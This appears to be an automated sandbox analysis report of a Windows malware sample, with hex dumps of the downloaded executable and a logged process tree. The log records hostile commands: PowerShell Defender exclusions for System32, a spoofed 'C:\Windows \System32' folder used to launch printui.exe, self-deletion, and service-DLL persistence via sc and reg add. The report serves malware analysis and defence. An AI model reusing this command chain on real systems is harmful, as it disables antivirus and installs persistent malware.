                                                                                            2024-12-20 15:21:43 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 f5 4f 65 67 00 00 00 00 00 00 00 00 f0 00 2e 22 0b 02 02 27 00 40 00 00 00 3e 9d 05 00 04 00 00 20 13 00 00 00 10 00 00 00 00 85 45 03 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 c0 9d 05 00 04 00 00 ca e4 9d 05 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00
                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdOeg."'@> E`
                                                                                            2024-12-20 15:21:43 UTC1378INData Raw: 00 00 00 eb 81 66 0f 1f 84 00 00 00 00 00 31 c0 48 87 03 eb 9c 66 0f 1f 84 00 00 00 00 00 48 8b 15 59 2b 9d 05 c7 06 01 00 00 00 48 8b 0d 3c 2b 9d 05 e8 cf 3a 00 00 e9 66 ff ff ff 66 90 48 8b 15 19 2b 9d 05 48 8b 0d 02 2b 9d 05 e8 b5 3a 00 00 c7 06 02 00 00 00 e9 51 ff ff ff 66 90 b9 1f 00 00 00 e8 e6 38 00 00 e9 35 ff ff ff 90 41 54 55 57 56 53 48 83 ec 20 4c 8b 25 9f 2a 9d 05 85 d2 48 89 ce 89 d3 41 89 14 24 4c 89 c7 75 47 8b 05 21 4e 9d 05 85 c0 74 5f e8 30 2d 00 00 49 89 f8 89 da 48 89 f1 e8 2e 29 00 00 89 c5 85 db 0f 84 b1 00 00 00 83 fb 03 0f 84 a8 00 00 00 89 e8 41 c7 04 24 ff ff ff ff 48 83 c4 20 5b 5e 5f 5d 41 5c c3 0f 1f 00 e8 f3 2c 00 00 8d 43 ff 49 89 f8 89 da 83 f8 01 48 89 f1 0f 87 a7 00 00 00 e8 ba fd ff ff 85 c0 75 06 31 ed eb c2 66 90 49
                                                                                            Data Ascii: f1HfHY+H<+:ffH+H+:Qf85ATUWVSH L%*HA$LuG!Nt_0-IH.)A$H [^_]A\,CIHu1fI
                                                                                            2024-12-20 15:21:43 UTC1378INData Raw: 55 10 48 01 c2 44 89 c0 31 c8 88 02 80 45 ff 01 80 7d ff 0f 76 c7 90 90 48 83 c4 10 5d c3 55 48 89 e5 48 83 ec 10 89 c8 48 89 55 18 4c 89 45 20 88 45 10 c6 45 ff 00 eb 7d c6 45 fe 00 eb 6d 0f b6 45 ff 0f b6 55 fe 48 8b 4d 18 48 63 d2 48 98 48 c1 e0 02 48 01 c8 48 01 d0 44 0f b6 00 0f b6 45 10 8d 14 85 00 00 00 00 0f b6 45 ff 01 d0 8d 14 85 00 00 00 00 0f b6 45 fe 01 d0 89 c2 48 8b 45 20 48 01 d0 0f b6 10 0f b6 45 ff 0f b6 4d fe 44 31 c2 4c 8b 45 18 48 63 c9 48 98 48 c1 e0 02 4c 01 c0 48 01 c8 88 10 80 45 fe 01 80 7d fe 03 76 8d 80 45 ff 01 80 7d ff 03 0f 86 79 ff ff ff 90 90 48 83 c4 10 5d c3 55 48 89 e5 48 83 ec 10 48 89 4d 10 48 8b 45 10 0f b6 40 0d 88 45 ff 48 8b 45 10 0f b6 40 09 48 8b 55 10 88 42 0d 48 8b 45 10 0f b6 40 05 48 8b 55 10 88 42 09 48 8b
                                                                                            Data Ascii: UHD1E}vH]UHHHULE EE}EmEUHMHcHHHHDEEEHE HEMD1LEHcHHLHE}vE}yH]UHHHMHE@EHE@HUBHE@HUBH
                                                                                            2024-12-20 15:21:43 UTC1378INData Raw: 10 0f b6 40 0a 48 8b 55 10 88 42 02 48 8b 55 10 0f b6 45 ff 88 42 0a 48 8b 45 10 0f b6 40 06 88 45 ff 48 8b 45 10 0f b6 40 0e 48 8b 55 10 88 42 06 48 8b 55 10 0f b6 45 ff 88 42 0e 48 8b 45 10 0f b6 40 03 88 45 ff 48 8b 45 10 0f b6 40 0f 48 8b 55 10 88 42 03 48 8b 45 10 0f b6 40 0b 48 8b 55 10 88 42 0f 48 8b 45 10 0f b6 40 07 48 8b 55 10 88 42 0b 48 8b 55 10 0f b6 45 ff 88 42 07 90 48 83 c4 10 5d c3 55 48 89 e5 48 83 ec 30 48 89 4d 10 c6 45 fe 00 c6 45 fd 00 c6 45 fc 00 c6 45 ff 00 e9 a8 01 00 00 0f b6 45 ff 48 8b 55 10 48 98 0f b6 04 82 88 45 fc 0f b6 45 ff 48 8b 55 10 48 98 0f b6 0c 82 0f b6 45 ff 48 8b 55 10 48 98 0f b6 44 82 01 31 c1 0f b6 45 ff 48 8b 55 10 48 98 0f b6 44 82 02 31 c1 0f b6 45 ff 48 8b 55 10 48 98 0f b6 44 82 03 31 c8 88 45 fe 0f b6 45
                                                                                            Data Ascii: @HUBHUEBHE@EHE@HUBHUEBHE@EHE@HUBHE@HUBHE@HUBHUEBH]UHH0HMEEEEEHUHEEHUHEHUHD1EHUHD1EHUHD1EE
                                                                                            2024-12-20 15:21:43 UTC1378INData Raw: 48 89 c1 e8 e0 f1 ff ff 90 48 83 c4 30 5d c3 55 48 89 e5 48 83 ec 20 48 89 4d 10 48 89 55 18 4c 89 45 20 4c 89 4d 28 4c 8b 45 28 48 8b 4d 20 48 8b 55 18 48 8b 45 10 4d 89 c1 49 89 c8 48 89 c1 e8 c2 fe ff ff 48 8b 4d 38 48 8b 55 20 48 8b 45 30 49 89 c8 48 89 c1 e8 cc 2c 00 00 48 8b 55 28 48 8b 45 20 49 89 d0 ba 00 00 00 00 48 89 c1 e8 74 f1 ff ff 90 48 83 c4 20 5d c3 55 48 89 e5 48 83 ec 30 48 89 4d 10 48 89 55 18 4c 89 45 20 44 89 c8 88 45 28 48 8b 45 20 48 83 c0 01 01 c0 66 89 45 fe 4c 8b 0d ee 3d 9d 05 80 7d 28 00 74 07 ba 08 02 00 00 eb 04 0f b7 55 fe c7 45 f8 30 00 00 00 8b 45 f8 65 48 8b 00 48 89 45 f0 48 8b 45 f0 48 8b 40 60 48 8b 40 30 49 89 d0 ba 08 00 00 00 48 89 c1 41 ff d1 48 8b 55 10 48 89 42 08 48 8b 45 10 48 8b 40 08 48 85 c0 75 07 b8 ff ff
                                                                                            Data Ascii: HH0]UHH HMHULE LM(LE(HM HUHEMIHHM8HU HE0IH,HU(HE IHtH ]UHH0HMHULE DE(HE HfEL=}(tUE0EeHHEHEH@`H@0IHAHUHBHEH@Hu
                                                                                            2024-12-20 15:21:43 UTC1378INData Raw: 39 9d 05 48 8b 85 90 00 00 00 48 89 c1 ff d2 8b 85 9c 01 00 00 e9 ab 06 00 00 4c 8b 0d 15 39 9d 05 c7 85 64 01 00 00 30 00 00 00 8b 85 64 01 00 00 65 48 8b 00 48 89 85 58 01 00 00 48 8b 85 58 01 00 00 48 8b 40 60 48 8b 40 30 41 b8 20 00 00 00 ba 08 00 00 00 48 89 c1 41 ff d1 48 89 85 88 01 00 00 48 83 bd 88 01 00 00 00 75 64 4c 8b 0d ca 38 9d 05 c7 85 54 01 00 00 30 00 00 00 8b 85 54 01 00 00 65 48 8b 00 48 89 85 48 01 00 00 48 8b 85 48 01 00 00 48 8b 40 60 48 8b 40 30 48 8b 95 90 01 00 00 49 89 d0 ba 00 00 00 00 48 89 c1 41 ff d1 48 8b 15 94 38 9d 05 48 8b 85 90 00 00 00 48 89 c1 ff d2 8b 85 9c 01 00 00 e9 f4 05 00 00 4c 8b 0d 5e 38 9d 05 c7 85 44 01 00 00 30 00 00 00 8b 85 44 01 00 00 65 48 8b 00 48 89 85 38 01 00 00 48 8b 85 38 01 00 00 48 8b 40 60 48
                                                                                            Data Ascii: 9HHL9d0deHHXHXH@`H@0A HAHHudL8T0TeHHHHHH@`H@0HIHAH8HHL^8D0DeHH8H8H@`H
                                                                                            2024-12-20 15:21:43 UTC1378INData Raw: e8 49 89 d0 ba 00 00 00 00 48 89 c1 e8 33 0f 00 00 48 8b 45 f8 48 89 c1 e8 0f 0f 00 00 48 8b 45 f0 48 85 c0 74 0c 48 8b 45 f0 48 89 c1 e8 fa 0e 00 00 4c 8b 0d a3 33 9d 05 c7 85 d4 00 00 00 30 00 00 00 8b 85 d4 00 00 00 65 48 8b 00 48 89 85 c8 00 00 00 48 8b 85 c8 00 00 00 48 8b 40 60 48 8b 40 30 48 8b 95 78 01 00 00 49 89 d0 ba 00 00 00 00 48 89 c1 41 ff d1 4c 8b 0d 5d 33 9d 05 c7 85 c4 00 00 00 30 00 00 00 8b 85 c4 00 00 00 65 48 8b 00 48 89 85 b8 00 00 00 48 8b 85 b8 00 00 00 48 8b 40 60 48 8b 40 30 48 8b 95 90 01 00 00 49 89 d0 ba 00 00 00 00 48 89 c1 41 ff d1 4c 8b 0d 17 33 9d 05 c7 85 b4 00 00 00 30 00 00 00 8b 85 b4 00 00 00 65 48 8b 00 48 89 85 a8 00 00 00 48 8b 85 a8 00 00 00 48 8b 40 60 48 8b 40 30 48 8b 95 88 01 00 00 49 89 d0 ba 00 00 00 00 48
                                                                                            Data Ascii: IH3HEHHEHtHEHL30eHHHH@`H@0HxIHAL]30eHHHH@`H@0HIHAL30eHHHH@`H@0HIH
                                                                                            2024-12-20 15:21:43 UTC1378INData Raw: eb 39 48 8b 85 c0 01 00 00 48 8b 50 50 48 8b 85 e0 01 00 00 48 01 c0 48 01 d0 0f b7 00 0f b7 c0 89 c1 e8 de e1 ff ff 48 8b 95 e0 01 00 00 66 89 44 55 a0 48 83 85 e0 01 00 00 01 48 8b 85 c0 01 00 00 48 8b 50 50 48 8b 85 e0 01 00 00 48 01 c0 48 01 d0 0f b7 00 66 85 c0 75 a7 48 8b 95 00 02 00 00 48 8d 45 a0 48 89 c1 e8 cc 19 00 00 85 c0 0f 94 c0 84 c0 74 1c 48 8b 85 c0 01 00 00 48 8b 50 20 48 8b 85 08 02 00 00 48 89 10 b8 00 00 00 00 eb 2a 48 8b 85 e8 01 00 00 48 8b 00 48 89 85 e8 01 00 00 48 8b 85 e8 01 00 00 48 3b 85 c8 01 00 00 0f 85 d9 fe ff ff b8 ff ff ff ff 48 81 c4 70 02 00 00 5d c3 55 48 81 ec d0 01 00 00 48 8d ac 24 80 00 00 00 c7 85 4c 01 00 00 00 00 00 00 48 c7 85 40 01 00 00 00 00 00 00 48 c7 85 38 01 00 00 00 00 00 00 48 c7 44 24 28 0b 00 00 00
                                                                                            Data Ascii: 9HHPPHHHHfDUHHHPPHHHfuHHEHtHHP HH*HHHHH;Hp]UHH$LH@H8HD$(
                                                                                            2024-12-20 15:21:43 UTC1378INData Raw: 9d 05 48 89 c1 e8 56 dc ff ff 41 b8 10 00 00 00 ba 00 00 00 00 48 8d 05 e4 29 9d 05 48 89 c1 e8 3c dc ff ff 41 b8 0c 00 00 00 ba 00 00 00 00 48 8d 05 da 29 9d 05 48 89 c1 e8 22 dc ff ff 41 b8 1d 00 00 00 ba 00 00 00 00 48 8d 05 d0 29 9d 05 48 89 c1 e8 08 dc ff ff 41 b8 1c 00 00 00 ba 00 00 00 00 48 8d 05 d6 29 9d 05 48 89 c1 e8 ee db ff ff 41 b8 0b 00 00 00 ba 00 00 00 00 48 8d 05 dc 29 9d 05 48 89 c1 e8 d4 db ff ff 41 b8 0d 00 00 00 ba 00 00 00 00 48 8d 05 d2 29 9d 05 48 89 c1 e8 ba db ff ff 8b 85 4c 01 00 00 48 81 c4 d0 01 00 00 5d c3 55 48 89 e5 48 81 ec a0 00 00 00 c7 45 fc 00 00 00 00 e8 98 fa ff ff 89 45 fc 83 7d fc 00 0f 88 48 03 00 00 b9 20 4e 00 00 e8 5d 17 00 00 48 c7 45 e0 00 00 00 00 48 c7 45 e8 00 00 00 00 48 c7 45 d0 00 00 00 00 48 c7 45 d8
                                                                                            Data Ascii: HVAH)H<AH)H"AH)HAH)HAH)HAH)HLH]UHHEE}H N]HEHEHEHE
                                                                                            2024-12-20 15:21:43 UTC1378INData Raw: 16 25 9d 05 01 00 00 00 e9 71 ff ff ff 90 48 83 ec 28 83 fa 03 74 17 85 d2 74 13 b8 01 00 00 00 48 83 c4 28 c3 66 0f 1f 84 00 00 00 00 00 e8 5b 07 00 00 b8 01 00 00 00 48 83 c4 28 c3 90 56 53 48 83 ec 28 48 8b 05 23 ff 9c 05 83 38 02 74 06 c7 00 02 00 00 00 83 fa 02 74 13 83 fa 01 74 4e b8 01 00 00 00 48 83 c4 28 5b 5e c3 66 90 48 8d 1d 69 53 9d 05 48 8d 35 62 53 9d 05 48 39 de 74 df 0f 1f 44 00 00 48 8b 03 48 85 c0 74 02 ff d0 48 83 c3 08 48 39 de 75 ed b8 01 00 00 00 48 83 c4 28 5b 5e c3 66 0f 1f 84 00 00 00 00 00 e8 db 06 00 00 b8 01 00 00 00 48 83 c4 28 5b 5e c3 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 31 c0 c3 90 90 90 90 90 90 90 90 90 90 90 90 90 56 53 48 83 ec 38 48 8d 44 24 58 48 89 cb b9 02 00 00 00 48 89 54 24 58 4c 89 44 24 60 4c 89 4c 24
                                                                                            Data Ascii: %qH(ttH(f[H(VSH(H#8tttNH([^fHiSH5bSH9tDHHtHH9uH([^fH([^ff.@1VSH8HD$XHHT$XLD$`LL$


                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            General

                                                                                            Target ID:0
                                                                                            Start time:10:19:49
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Users\user\Desktop\58VSNPxrI4.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Users\user\Desktop\58VSNPxrI4.exe"
                                                                                            Imagebase:0x7ff783aa0000
                                                                                            File size:14'664'704 bytes
                                                                                            MD5 hash:228C09C31156D45DFE94195BB34D1399
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:2
                                                                                            Start time:10:19:50
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
                                                                                            Imagebase:0x7ff6763a0000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:3
                                                                                            Start time:10:19:50
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:4
                                                                                            Start time:10:19:50
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
                                                                                            Imagebase:0x7ff6cb6b0000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:6
                                                                                            Start time:10:19:54
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
                                                                                            Imagebase:0x7ff6763a0000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:7
                                                                                            Start time:10:19:54
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:8
                                                                                            Start time:10:19:55
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
                                                                                            Imagebase:0x7ff6cb6b0000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:9
                                                                                            Start time:10:19:58
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:cmd.exe /c mkdir "\\?\C:\Windows \System32"
                                                                                            Imagebase:0x7ff6763a0000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:10
                                                                                            Start time:10:19:58
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:11
                                                                                            Start time:10:19:58
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:cmd.exe /c start "" "C:\Windows \System32\printui.exe"
                                                                                            Imagebase:0x7ff6763a0000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:12
                                                                                            Start time:10:19:58
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:13
                                                                                            Start time:10:19:58
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows \System32\printui.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows \System32\printui.exe"
                                                                                            Imagebase:0x7ff616b10000
                                                                                            File size:64'000 bytes
                                                                                            MD5 hash:2FC3530F3E05667F8240FC77F7486E7E
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 0%, ReversingLabs
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:14
                                                                                            Start time:10:19:58
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\58VSNPxrI4.exe"
                                                                                            Imagebase:0x7ff6763a0000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:15
                                                                                            Start time:10:19:58
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:16
                                                                                            Start time:10:19:58
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
                                                                                            Imagebase:0x7ff6763a0000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:17
                                                                                            Start time:10:19:58
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:18
                                                                                            Start time:10:19:58
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:timeout /t 10 /nobreak
                                                                                            Imagebase:0x7ff63c990000
                                                                                            File size:32'768 bytes
                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:19
                                                                                            Start time:10:19:58
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
                                                                                            Imagebase:0x7ff6cb6b0000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:21
                                                                                            Start time:10:20:03
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:cmd.exe /c sc create x939048 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x939048\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x939048.dat" /f && sc start x939048
                                                                                            Imagebase:0x7ff6763a0000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:22
                                                                                            Start time:10:20:03
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:23
                                                                                            Start time:10:20:03
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:sc create x939048 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
                                                                                            Imagebase:0x7ff68d2c0000
                                                                                            File size:72'192 bytes
                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:24
                                                                                            Start time:10:20:04
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\reg.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:reg add HKLM\SYSTEM\CurrentControlSet\services\x939048\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x939048.dat" /f
                                                                                            Imagebase:0x7ff74c870000
                                                                                            File size:77'312 bytes
                                                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:25
                                                                                            Start time:10:20:04
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:sc start x939048
                                                                                            Imagebase:0x7ff68d2c0000
                                                                                            File size:72'192 bytes
                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:26
                                                                                            Start time:10:20:04
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\System32\svchost.exe -k DcomLaunch
                                                                                            Imagebase:0x7ff67e6d0000
                                                                                            File size:55'320 bytes
                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:27
                                                                                            Start time:10:20:04
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
                                                                                            Imagebase:0x7ff6763a0000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:28
                                                                                            Start time:10:20:04
                                                                                            Start date:20/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
                                                                                            Imagebase:0x7ff6763a0000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

